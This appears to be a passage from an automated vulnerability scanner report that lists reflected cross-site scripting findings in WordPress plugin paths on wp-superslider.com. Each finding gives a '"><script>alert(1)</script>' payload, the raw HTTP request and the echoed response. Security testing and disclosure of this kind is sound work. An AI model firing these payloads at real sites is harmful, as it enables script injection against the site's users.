Date: Wed, 02 Feb 2011 19:22:30 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674551+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674551; expires=Thu, 02-Feb-2012 19:22:31 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:31 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider51aa1\"><script>alert(1)</script>6001cc5eecf/ssExcerpt/default/default.css" />
...[SNIP]...

4.173. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 116ab"><script>alert(1)</script>ee2c400a80f was submitted in the REST URL parameter 7. This input was echoed as 116ab\"><script>alert(1)</script>ee2c400a80f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt116ab"><script>alert(1)</script>ee2c400a80f/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674552+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674553; expires=Thu, 02-Feb-2012 19:22:33 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:33 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt116ab\"><script>alert(1)</script>ee2c400a80f/default/default.css" />
...[SNIP]...

4.174. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 8] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5882b"><script>alert(1)</script>8f70873ebba was submitted in the REST URL parameter 8. This input was echoed as 5882b\"><script>alert(1)</script>8f70873ebba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default5882b"><script>alert(1)</script>8f70873ebba/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:34 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674554+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674554; expires=Thu, 02-Feb-2012 19:22:34 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:34 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default5882b\"><script>alert(1)</script>8f70873ebba/default.css" />
...[SNIP]...

4.175. http://wp-superslider.com/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44970"><script>alert(1)</script>402867fa415 was submitted in the REST URL parameter 9. This input was echoed as 44970\"><script>alert(1)</script>402867fa415 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css44970"><script>alert(1)</script>402867fa415 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:37 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674557+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674557; expires=Thu, 02-Feb-2012 19:22:37 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css44970\"><script>alert(1)</script>402867fa415" />
...[SNIP]...

4.176. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75bf0"><script>alert(1)</script>d53f8f09d5f was submitted in the REST URL parameter 1. This input was echoed as 75bf0\"><script>alert(1)</script>d53f8f09d5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site75bf0"><script>alert(1)</script>d53f8f09d5f/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674542+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674542; expires=Thu, 02-Feb-2012 19:22:22 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:22 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site75bf0\"><script>alert(1)</script>d53f8f09d5f/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css" />
...[SNIP]...

4.177. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31761"><script>alert(1)</script>9a2ec4ef367 was submitted in the REST URL parameter 2. This input was echoed as 31761\"><script>alert(1)</script>9a2ec4ef367 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content31761"><script>alert(1)</script>9a2ec4ef367/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:23 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674543+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674543; expires=Thu, 02-Feb-2012 19:22:23 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:23 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content31761\"><script>alert(1)</script>9a2ec4ef367/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css" />
...[SNIP]...

4.178. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 214f6"><script>alert(1)</script>21d72fb4419 was submitted in the REST URL parameter 3. This input was echoed as 214f6\"><script>alert(1)</script>21d72fb4419 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins214f6"><script>alert(1)</script>21d72fb4419/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674545+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674545; expires=Thu, 02-Feb-2012 19:22:25 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:25 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins214f6\"><script>alert(1)</script>21d72fb4419/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css" />
...[SNIP]...

4.179. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c380"><script>alert(1)</script>942fd5177a7 was submitted in the REST URL parameter 4. This input was echoed as 7c380\"><script>alert(1)</script>942fd5177a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-login7c380"><script>alert(1)</script>942fd5177a7/plugin-data/superslider/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:26 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674547+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674547; expires=Thu, 02-Feb-2012 19:22:27 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:27 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-login7c380\"><script>alert(1)</script>942fd5177a7/plugin-data/superslider/ssLogin/default/default_horizontal.css" />
...[SNIP]...

4.180. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53af1"><script>alert(1)</script>8d9b584a4b9 was submitted in the REST URL parameter 5. This input was echoed as 53af1\"><script>alert(1)</script>8d9b584a4b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-login/plugin-data53af1"><script>alert(1)</script>8d9b584a4b9/superslider/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:28 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674548+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674549; expires=Thu, 02-Feb-2012 19:22:29 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:29 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-login/plugin-data53af1\"><script>alert(1)</script>8d9b584a4b9/superslider/ssLogin/default/default_horizontal.css" />
...[SNIP]...

4.181. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d94d5"><script>alert(1)</script>8937e1e9ddf was submitted in the REST URL parameter 6. This input was echoed as d94d5\"><script>alert(1)</script>8937e1e9ddf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-login/plugin-data/supersliderd94d5"><script>alert(1)</script>8937e1e9ddf/ssLogin/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:30 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674550+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674551; expires=Thu, 02-Feb-2012 19:22:31 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:31 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53483

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-login/plugin-data/supersliderd94d5\"><script>alert(1)</script>8937e1e9ddf/ssLogin/default/default_horizontal.css" />
...[SNIP]...

4.182. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1d48"><script>alert(1)</script>dbdb56bcb58 was submitted in the REST URL parameter 7. This input was echoed as e1d48\"><script>alert(1)</script>dbdb56bcb58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogine1d48"><script>alert(1)</script>dbdb56bcb58/default/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674552+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674553; expires=Thu, 02-Feb-2012 19:22:33 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:33 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogine1d48\"><script>alert(1)</script>dbdb56bcb58/default/default_horizontal.css" />
...[SNIP]...

4.183. http://wp-superslider.com/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css [REST URL parameter 8] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afe00"><script>alert(1)</script>5f54c2a8b93 was submitted in the REST URL parameter 8. This input was echoed as afe00\"><script>alert(1)</script>5f54c2a8b93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/defaultafe00"><script>alert(1)</script>5f54c2a8b93/default_horizontal.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:34 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674554+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674555; expires=Thu, 02-Feb-2012 19:22:35 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
